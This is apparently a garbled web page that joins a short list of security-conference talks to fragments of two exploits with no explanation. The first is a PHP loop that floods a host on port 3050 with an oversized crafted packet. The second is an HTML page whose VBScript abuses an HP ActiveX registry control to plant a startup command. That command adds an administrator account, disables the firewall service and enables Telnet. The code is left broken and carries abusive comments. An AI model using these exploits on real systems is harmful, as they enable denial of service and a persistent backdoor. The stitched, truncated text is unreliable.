Amit Yoran, Chairman and CEO, NetWitness Corporation
Removing the Uncertainty and Doubt (but not the Fear) from Information
Risk Management
Billy Rios and Jeff Carr, Microsoft
Sun Tzu was a Hacker - A Examination of the Tactics and Operations
from a Real World Cyber Attack
Olivier Thonnard, Royal Military Academy, Belgium
Behavioral Analysis of Zombie Armies
* 0x0090 4C 4D 5A 2F 4D 4A 68 2E-3A 04 00 00 00 00 3E 00 LMZ/MJh.:.....>.
* 0x00A0 00 00 ..
*
*/
$___suntzu = "\x00\x00\x00\x4a" . str_repeat( "\x4a" , 3000);
for ($temp = 0; $temp < 5; $temp ++){
$___zuntzu = fsockopen('192.168.124.99',3050);
fwrite($___zuntzu , $___suntzu);
fclose($___zuntzu );
sleep(1);
<html>
<object classid='clsid:19092490-676B-4C06-A158-34F1CD2DE517' id='HPRevolutionRegistryManager' /></OBJECT>
<script language='vbscript'>
group="HKEY_LOCAL_MACHINE"
section="SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"
key="sun-tzu"
valType=1 'REG_SZ
value="""c:\windows\system32\cmd.exe"" /c net user sun tzu /add & net localgroup Administrators sun /add & sc config SharedAccess start= disabled & net stop SharedAccess & sc config TlntSvr start= auto & net start TlntSvr & echo whatthefuck(!) & pause" 'you meretrix...
HPRevolutionRegistryManager.WriteRegistry group ,section ,key ,valType ,value 'die of miserable death mommy
</script>
</html>
